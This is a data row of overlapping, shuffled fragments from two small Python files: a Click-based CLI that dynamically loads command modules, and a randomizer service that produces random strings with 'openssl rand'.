%s', command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted command", "name): \"\"\"Dynamically import modules in the _commands_ directory.\"\"\" try: if sys.version_info[0] == 2:", "directory.\"\"\" try: if sys.version_info[0] == 2: self.log.debug('Python 2 detected, encoding \"%s\" in ascii.',", "try: if sys.version_info[0] == 2: self.log.debug('Python 2 detected, encoding \"%s\" in ascii.', name)", "not filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding command to list: %s', command_name) command_list.append(command_name) command_list.sort()", "stderr only if verbose is enabled.\"\"\" if self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click", "command_list) return command_list def get_command(self, ctx, name): \"\"\"Dynamically import modules in the _commands_", "list_commands(self, ctx): \"\"\"Search through the _commands_ directory for modules to use.\"\"\" command_list =", "command_list = [] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename in os.listdir(cmd_folder): self.log.debug('Found", "only if verbose is enabled.\"\"\" if self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click class", "filename) if filename.endswith('.py'): if not filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding command to list:", "self.log.debug('Python 2 detected, encoding \"%s\" in ascii.', name) name = name.encode('ascii', 'replace') mod", "information between commands.\"\"\" def __init__(self): self.verbose = False def log(self, msg, *args): \"\"\"Logs", "os.path.dirname(__file__), 'commands')) for filename in os.listdir(cmd_folder): self.log.debug('Found file in command directory: %s', filename)", "msg %= args click.echo(msg, file=sys.stderr) def vlog(self, msg, *args): \"\"\"Logs a message to", "name) self.log.warning('Error information:\\n%s', error) return except SyntaxError: self.log.warning('Failed to import: %s', name) self.log.warning('Might", "modules to use.\"\"\" command_list = [] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename", "SyntaxError: self.log.warning('Failed to import: %s', name) self.log.warning('Might be a Python %s incompatible module.',", "self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click class for gathering commands.\"\"\" log = logging.getLogger(__name__)", "for modules to use.\"\"\" command_list = [] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for", "verbose is enabled.\"\"\" if self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click class for gathering", "a message to stderr only if verbose is enabled.\"\"\" if self.verbose: self.log(msg, *args)", "command list: %s', command_list) return command_list def get_command(self, ctx, name): \"\"\"Dynamically import modules", "self.log.debug('Adding command to list: %s', command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list: %s', command_list)", "self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click class for gathering commands.\"\"\" log = logging.getLogger(__name__) def", "gathering commands.\"\"\" log = logging.getLogger(__name__) def list_commands(self, ctx): \"\"\"Search through the _commands_ directory", "self.log.warning('Failed to import: %s', name) self.log.warning('Might be a Python %s incompatible module.', sys.version_info[0])", "filename.endswith('.py'): if not filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding command to list: %s', command_name)", "== 2: self.log.debug('Python 2 detected, encoding \"%s\" in ascii.', name) name = name.encode('ascii',", "name = name.encode('ascii', 'replace') mod = importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s', mod) return", "%s', name) self.log.warning('Error information:\\n%s', error) return except SyntaxError: self.log.warning('Failed to import: %s', name)", "command directory: %s', filename) if filename.endswith('.py'): if not filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding", "error) return except SyntaxError: self.log.warning('Failed to import: %s', name) self.log.warning('Might be a Python", "def list_commands(self, ctx): \"\"\"Search through the _commands_ directory for modules to use.\"\"\" command_list", "encoding \"%s\" in ascii.', name) name = name.encode('ascii', 'replace') mod = importlib.import_module('.commands.{0}'.format(name), __package__)", "*args) class FunCLI(click.MultiCommand): \"\"\"Click class for gathering commands.\"\"\" log = logging.getLogger(__name__) def list_commands(self,", "command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list: %s', command_list) return command_list def get_command(self, ctx, name):", "in os.listdir(cmd_folder): self.log.debug('Found file in command directory: %s', filename) if filename.endswith('.py'): if not", "= filename[0:-3] self.log.debug('Adding command to list: %s', command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list:", "os.listdir(cmd_folder): self.log.debug('Found file in command directory: %s', filename) if filename.endswith('.py'): if not filename.startswith('__'):", "context object for passing information between commands.\"\"\" def __init__(self): self.verbose = False def", "to list: %s', command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list: %s', command_list) return command_list", "for passing information between commands.\"\"\" def __init__(self): self.verbose = False def log(self, msg,", "list: %s', command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list: %s', command_list) return command_list def", "self.log.debug('Sorted command list: %s', command_list) return command_list def get_command(self, ctx, name): \"\"\"Dynamically import", "to import: %s', name) self.log.warning('Error information:\\n%s', error) return except SyntaxError: self.log.warning('Failed to import:", "detected, encoding \"%s\" in ascii.', name) name = name.encode('ascii', 'replace') mod = importlib.import_module('.commands.{0}'.format(name),", "through the _commands_ directory for modules to use.\"\"\" command_list = [] cmd_folder =", "FunCLI(click.MultiCommand): \"\"\"Click class for gathering commands.\"\"\" log = logging.getLogger(__name__) def list_commands(self, ctx): \"\"\"Search", "msg, *args): \"\"\"Logs a message to stderr.\"\"\" if args: msg %= args click.echo(msg,", "in the _commands_ directory.\"\"\" try: if sys.version_info[0] == 2: self.log.debug('Python 2 detected, encoding", "name.encode('ascii', 'replace') mod = importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s', mod) return mod.cli except", "passing information between commands.\"\"\" def __init__(self): self.verbose = False def log(self, msg, *args):", "return mod.cli except ImportError as error: self.log.warning('Failed to import: %s', name) self.log.warning('Error information:\\n%s',", "False def log(self, msg, *args): \"\"\"Logs a message to stderr.\"\"\" if args: msg", "args click.echo(msg, file=sys.stderr) def vlog(self, msg, *args): \"\"\"Logs a message to stderr only", "to use.\"\"\" command_list = [] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename in", "self.log.debug('Found file in command directory: %s', filename) if filename.endswith('.py'): if not filename.startswith('__'): command_name", "name) name = name.encode('ascii', 'replace') mod = importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s', mod)", "%s', filename) if filename.endswith('.py'): if not filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding command to", "= [] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename in os.listdir(cmd_folder): self.log.debug('Found file", "for gathering commands.\"\"\" log = logging.getLogger(__name__) def list_commands(self, ctx): \"\"\"Search through the _commands_", "in ascii.', name) name = name.encode('ascii', 'replace') mod = importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module:", "__init__(self): self.verbose = False def log(self, msg, *args): \"\"\"Logs a message to stderr.\"\"\"", "except SyntaxError: self.log.warning('Failed to import: %s', name) self.log.warning('Might be a Python %s incompatible", "commands.\"\"\" log = logging.getLogger(__name__) def list_commands(self, ctx): \"\"\"Search through the _commands_ directory for", "self.log.warning('Error information:\\n%s', error) return except SyntaxError: self.log.warning('Failed to import: %s', name) self.log.warning('Might be", "command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list: %s', command_list) return command_list def get_command(self, ctx,", "to import: %s', name) self.log.warning('Might be a Python %s incompatible module.', sys.version_info[0]) return", "vlog(self, msg, *args): \"\"\"Logs a message to stderr only if verbose is enabled.\"\"\"", "click.echo(msg, file=sys.stderr) def vlog(self, msg, *args): \"\"\"Logs a message to stderr only if", "to stderr only if verbose is enabled.\"\"\" if self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand):", "if verbose is enabled.\"\"\" if self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click class for", "importlib import logging import os import sys import click class Context(object): \"\"\"Shared context", "directory: %s', filename) if filename.endswith('.py'): if not filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding command", "def get_command(self, ctx, name): \"\"\"Dynamically import modules in the _commands_ directory.\"\"\" try: if", "import modules in the _commands_ directory.\"\"\" try: if sys.version_info[0] == 2: self.log.debug('Python 2", "logging.getLogger(__name__) def list_commands(self, ctx): \"\"\"Search through the _commands_ directory for modules to use.\"\"\"", "if filename.endswith('.py'): if not filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding command to list: %s',", "to stderr.\"\"\" if args: msg %= args click.echo(msg, file=sys.stderr) def vlog(self, msg, *args):", "ImportError as error: self.log.warning('Failed to import: %s', name) self.log.warning('Error information:\\n%s', error) return except", "\"\"\"FunCLI classes.\"\"\" import importlib import logging import os import sys import click class", "a message to stderr.\"\"\" if args: msg %= args click.echo(msg, file=sys.stderr) def vlog(self,", "return except SyntaxError: self.log.warning('Failed to import: %s', name) self.log.warning('Might be a Python %s", "message to stderr only if verbose is enabled.\"\"\" if self.verbose: self.log(msg, *args) class", "if args: msg %= args click.echo(msg, file=sys.stderr) def vlog(self, msg, *args): \"\"\"Logs a", "filename[0:-3] self.log.debug('Adding command to list: %s', command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list: %s',", "*args): \"\"\"Logs a message to stderr.\"\"\" if args: msg %= args click.echo(msg, file=sys.stderr)", "self.log.warning('Failed to import: %s', name) self.log.warning('Error information:\\n%s', error) return except SyntaxError: self.log.warning('Failed to", "between commands.\"\"\" def __init__(self): self.verbose = False def log(self, msg, *args): \"\"\"Logs a", "mod.cli except ImportError as error: self.log.warning('Failed to import: %s', name) self.log.warning('Error information:\\n%s', error)", "Context(object): \"\"\"Shared context object for passing information between commands.\"\"\" def __init__(self): self.verbose =", "message to stderr.\"\"\" if args: msg %= args click.echo(msg, file=sys.stderr) def vlog(self, msg,", "__package__) self.log.debug('Imported module: %s', mod) return mod.cli except ImportError as error: self.log.warning('Failed to", "mod) return mod.cli except ImportError as error: self.log.warning('Failed to import: %s', name) self.log.warning('Error", "self.verbose = False def log(self, msg, *args): \"\"\"Logs a message to stderr.\"\"\" if", "directory for modules to use.\"\"\" command_list = [] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands'))", "ascii.', name) name = name.encode('ascii', 'replace') mod = importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s',", "\"\"\"Dynamically import modules in the _commands_ directory.\"\"\" try: if sys.version_info[0] == 2: self.log.debug('Python", "filename.startswith('__'): command_name = filename[0:-3] self.log.debug('Adding command to list: %s', command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted", "_commands_ directory.\"\"\" try: if sys.version_info[0] == 2: self.log.debug('Python 2 detected, encoding \"%s\" in", "as error: self.log.warning('Failed to import: %s', name) self.log.warning('Error information:\\n%s', error) return except SyntaxError:", "import os import sys import click class Context(object): \"\"\"Shared context object for passing", "= name.encode('ascii', 'replace') mod = importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s', mod) return mod.cli", "os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename in os.listdir(cmd_folder): self.log.debug('Found file in command directory: %s',", "'commands')) for filename in os.listdir(cmd_folder): self.log.debug('Found file in command directory: %s', filename) if", "= logging.getLogger(__name__) def list_commands(self, ctx): \"\"\"Search through the _commands_ directory for modules to", "\"\"\"Search through the _commands_ directory for modules to use.\"\"\" command_list = [] cmd_folder", "command_list def get_command(self, ctx, name): \"\"\"Dynamically import modules in the _commands_ directory.\"\"\" try:", "cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename in os.listdir(cmd_folder): self.log.debug('Found file in command", "'replace') mod = importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s', mod) return mod.cli except ImportError", "importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s', mod) return mod.cli except ImportError as error: self.log.warning('Failed", "object for passing information between commands.\"\"\" def __init__(self): self.verbose = False def log(self,", "class FunCLI(click.MultiCommand): \"\"\"Click class for gathering commands.\"\"\" log = logging.getLogger(__name__) def list_commands(self, ctx):", "in command directory: %s', filename) if filename.endswith('.py'): if not filename.startswith('__'): command_name = filename[0:-3]", "%s', mod) return mod.cli except ImportError as error: self.log.warning('Failed to import: %s', name)", "log(self, msg, *args): \"\"\"Logs a message to stderr.\"\"\" if args: msg %= args", "= os.path.abspath(os.path.join( os.path.dirname(__file__), 'commands')) for filename in os.listdir(cmd_folder): self.log.debug('Found file in command directory:", "file in command directory: %s', filename) if filename.endswith('.py'): if not filename.startswith('__'): command_name =", "*args): \"\"\"Logs a message to stderr only if verbose is enabled.\"\"\" if self.verbose:", "msg, *args): \"\"\"Logs a message to stderr only if verbose is enabled.\"\"\" if", "click class Context(object): \"\"\"Shared context object for passing information between commands.\"\"\" def __init__(self):", "command to list: %s', command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list: %s', command_list) return", "args: msg %= args click.echo(msg, file=sys.stderr) def vlog(self, msg, *args): \"\"\"Logs a message", "stderr.\"\"\" if args: msg %= args click.echo(msg, file=sys.stderr) def vlog(self, msg, *args): \"\"\"Logs", "modules in the _commands_ directory.\"\"\" try: if sys.version_info[0] == 2: self.log.debug('Python 2 detected,", "commands.\"\"\" def __init__(self): self.verbose = False def log(self, msg, *args): \"\"\"Logs a message", "%s', command_list) return command_list def get_command(self, ctx, name): \"\"\"Dynamically import modules in the", "sys.version_info[0] == 2: self.log.debug('Python 2 detected, encoding \"%s\" in ascii.', name) name =", "sys import click class Context(object): \"\"\"Shared context object for passing information between commands.\"\"\"", "list: %s', command_list) return command_list def get_command(self, ctx, name): \"\"\"Dynamically import modules in", "mod = importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s', mod) return mod.cli except ImportError as", "import sys import click class Context(object): \"\"\"Shared context object for passing information between", "_commands_ directory for modules to use.\"\"\" command_list = [] cmd_folder = os.path.abspath(os.path.join( os.path.dirname(__file__),", "\"\"\"Shared context object for passing information between commands.\"\"\" def __init__(self): self.verbose = False", "<reponame>e4r7hbug/cli-fun<filename>cli_fun/classes.py<gh_stars>0 \"\"\"FunCLI classes.\"\"\" import importlib import logging import os import sys import click", "filename in os.listdir(cmd_folder): self.log.debug('Found file in command directory: %s', filename) if filename.endswith('.py'): if", "information:\\n%s', error) return except SyntaxError: self.log.warning('Failed to import: %s', name) self.log.warning('Might be a", "module: %s', mod) return mod.cli except ImportError as error: self.log.warning('Failed to import: %s',", "def vlog(self, msg, *args): \"\"\"Logs a message to stderr only if verbose is", "%s', command_name) command_list.append(command_name) command_list.sort() self.log.debug('Sorted command list: %s', command_list) return command_list def get_command(self,", "is enabled.\"\"\" if self.verbose: self.log(msg, *args) class FunCLI(click.MultiCommand): \"\"\"Click class for gathering commands.\"\"\"", "import: %s', name) self.log.warning('Error information:\\n%s', error) return except SyntaxError: self.log.warning('Failed to import: %s',", "%= args click.echo(msg, file=sys.stderr) def vlog(self, msg, *args): \"\"\"Logs a message to stderr", "error: self.log.warning('Failed to import: %s', name) self.log.warning('Error information:\\n%s', error) return except SyntaxError: self.log.warning('Failed", "file=sys.stderr) def vlog(self, msg, *args): \"\"\"Logs a message to stderr only if verbose", "def log(self, msg, *args): \"\"\"Logs a message to stderr.\"\"\" if args: msg %=", "= importlib.import_module('.commands.{0}'.format(name), __package__) self.log.debug('Imported module: %s', mod) return mod.cli except ImportError as error:" ]
[ "value): ''' :param key: Int32 :type key: System.Int32 or int :param value: SphericalHarmonicsL2", "UdonPie.Undefined import * class SphericalHarmonicsL2Array: def __new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array", ":type value: UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self, key): ''' :param key: Int32 :type", "''' pass def __getitem__(self, key): ''' :param key: Int32 :type key: System.Int32 or", "value: SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self, key): ''' :param key:", "key: Int32 :type key: System.Int32 or int :returns: SphericalHarmonicsL2 :rtype: UnityEngine.SphericalHarmonicsL2 ''' pass", "SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self, key): ''' :param key: Int32", "key: Int32 :type key: System.Int32 or int :param value: SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2", "''' :param key: Int32 :type key: System.Int32 or int :returns: SphericalHarmonicsL2 :rtype: UnityEngine.SphericalHarmonicsL2", "def __setitem__(self, key, value): ''' :param key: Int32 :type key: System.Int32 or int", ":param key: Int32 :type key: System.Int32 or int :param value: SphericalHarmonicsL2 :type value:", "System.Int32 or int :param value: SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self,", "key): ''' :param key: Int32 :type key: System.Int32 or int :returns: SphericalHarmonicsL2 :rtype:", ":param key: Int32 :type key: System.Int32 or int :returns: SphericalHarmonicsL2 :rtype: UnityEngine.SphericalHarmonicsL2 '''", "import UnityEngine from UdonPie.Undefined import * class SphericalHarmonicsL2Array: def __new__(cls, arg1=None): ''' :returns:", "or int :param value: SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self, key):", "Int32 :type key: System.Int32 or int :param value: SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2 '''", "from UdonPie import UnityEngine from UdonPie.Undefined import * class SphericalHarmonicsL2Array: def __new__(cls, arg1=None):", "UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self, key, value): ''' :param key: Int32 :type key:", "''' pass def __setitem__(self, key, value): ''' :param key: Int32 :type key: System.Int32", "<reponame>Grim-es/udon-pie-auto-completion from UdonPie import System from UdonPie import UnityEngine from UdonPie.Undefined import *", "UnityEngine from UdonPie.Undefined import * class SphericalHarmonicsL2Array: def __new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array", "from UdonPie.Undefined import * class SphericalHarmonicsL2Array: def __new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype:", "value: UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self, key): ''' :param key: Int32 :type key:", "from UdonPie import System from UdonPie import UnityEngine from UdonPie.Undefined import * class", "def __getitem__(self, key): ''' :param key: Int32 :type key: System.Int32 or int :returns:", "''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self, key, value): ''' :param", "SphericalHarmonicsL2Array: def __new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self,", "key: System.Int32 or int :param value: SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2 ''' pass def", "pass def __setitem__(self, key, value): ''' :param key: Int32 :type key: System.Int32 or", "def __new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self, key,", "__setitem__(self, key, value): ''' :param key: Int32 :type key: System.Int32 or int :param", ":param value: SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self, key): ''' :param", "SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self, key, value): ''' :param key: Int32", "arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self, key, value): '''", ":returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self, key, value): ''' :param key:", ":rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self, key, value): ''' :param key: Int32 :type", "''' :param key: Int32 :type key: System.Int32 or int :param value: SphericalHarmonicsL2 :type", "class SphericalHarmonicsL2Array: def __new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def", ":type key: System.Int32 or int :param value: SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2 ''' pass", "int :param value: SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self, key): '''", "__new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self, key, value):", "UdonPie import UnityEngine from UdonPie.Undefined import * class SphericalHarmonicsL2Array: def __new__(cls, arg1=None): '''", "import * class SphericalHarmonicsL2Array: def __new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array '''", "* class SphericalHarmonicsL2Array: def __new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass", "import System from UdonPie import UnityEngine from UdonPie.Undefined import * class SphericalHarmonicsL2Array: def", "__getitem__(self, key): ''' :param key: Int32 :type key: System.Int32 or int :returns: SphericalHarmonicsL2", "key, value): ''' :param key: Int32 :type key: System.Int32 or int :param value:", "UdonPie import System from UdonPie import UnityEngine from UdonPie.Undefined import * class SphericalHarmonicsL2Array:", "System from UdonPie import UnityEngine from UdonPie.Undefined import * class SphericalHarmonicsL2Array: def __new__(cls,", "pass def __getitem__(self, key): ''' :param key: Int32 :type key: System.Int32 or int", "UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self, key): ''' :param key: Int32 :type key: System.Int32" ]
[]
[ "_use_openssl_base64(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length: int)", "int) -> str: return subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length: int) ->", "length: int): if method not in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def", "Randomizer: def __init__(self): self.__known_generator_map: Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, }", "int): if method not in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length:", "lru_cache from typing import Callable, Dict, List from imagination.decorator.service import registered @registered() class", "= { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1) def known_methods(self) -> List[str]:", "{ RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1) def known_methods(self) -> List[str]: return", "not in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int) -> str:", "in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int) -> str: return", "str: return subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length: int) -> str: return", "'-base64', str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip()", "typing import Callable, Dict, List from imagination.decorator.service import registered @registered() class Randomizer: def", "return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip()", "str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class", "method not in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int) ->", "return subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length: int) -> str: return subprocess.check_output(['openssl',", "RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1) def known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys())", "self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int) -> str: return subprocess.check_output(['openssl',", "<filename>keymaster/common/service/randomizer.py<gh_stars>0 import subprocess from functools import lru_cache from typing import Callable, Dict, List", "import registered @registered() class Randomizer: def __init__(self): self.__known_generator_map: Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64:", "Dict, List from imagination.decorator.service import registered @registered() class Randomizer: def __init__(self): self.__known_generator_map: Dict[str,", "import lru_cache from typing import Callable, Dict, List from imagination.decorator.service import registered @registered()", "List from imagination.decorator.service import registered @registered() class Randomizer: def __init__(self): self.__known_generator_map: Dict[str, Callable]", "class Randomizer: def __init__(self): self.__known_generator_map: Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex,", "raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int) -> str: return subprocess.check_output(['openssl', 'rand',", "def _use_openssl_hex(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64", "str: return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64 = 'openssl:base64' OPENSSL_HEX =", "self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() @staticmethod", "from functools import lru_cache from typing import Callable, Dict, List from imagination.decorator.service import", "imagination.decorator.service import registered @registered() class Randomizer: def __init__(self): self.__known_generator_map: Dict[str, Callable] = {", "def __init__(self): self.__known_generator_map: Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property", "def randomize(self, method: str, length: int): if method not in self.__known_generator_map: raise UnknownRandomizationMethodError(method)", "subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length: int) -> str: return subprocess.check_output(['openssl', 'rand',", "@staticmethod def _use_openssl_hex(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod:", "Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1) def known_methods(self)", "subprocess from functools import lru_cache from typing import Callable, Dict, List from imagination.decorator.service", "self.__known_generator_map: Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1) def", "self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1) def known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys()) def", "@lru_cache(maxsize=1) def known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self, method: str, length: int):", "return sorted(self.__known_generator_map.keys()) def randomize(self, method: str, length: int): if method not in self.__known_generator_map:", "method: str, length: int): if method not in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length)", "-> str: return subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length: int) -> str:", "import Callable, Dict, List from imagination.decorator.service import registered @registered() class Randomizer: def __init__(self):", "from typing import Callable, Dict, List from imagination.decorator.service import registered @registered() class Randomizer:", "@staticmethod def _use_openssl_base64(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() @staticmethod def", "'rand', '-base64', str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-hex',", "functools import lru_cache from typing import Callable, Dict, List from imagination.decorator.service import registered", "_use_openssl_hex(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64 =", "Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1) def known_methods(self) ->", "from imagination.decorator.service import registered @registered() class Randomizer: def __init__(self): self.__known_generator_map: Dict[str, Callable] =", "__init__(self): self.__known_generator_map: Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1)", "int) -> str: return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64 = 'openssl:base64'", "-> str: return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64 = 'openssl:base64' OPENSSL_HEX", "-> List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self, method: str, length: int): if method not", "str, length: int): if method not in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod", "'-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64 = 'openssl:base64' OPENSSL_HEX = 'openssl:hex' class UnknownRandomizationMethodError(RuntimeError): pass", "sorted(self.__known_generator_map.keys()) def randomize(self, method: str, length: int): if method not in 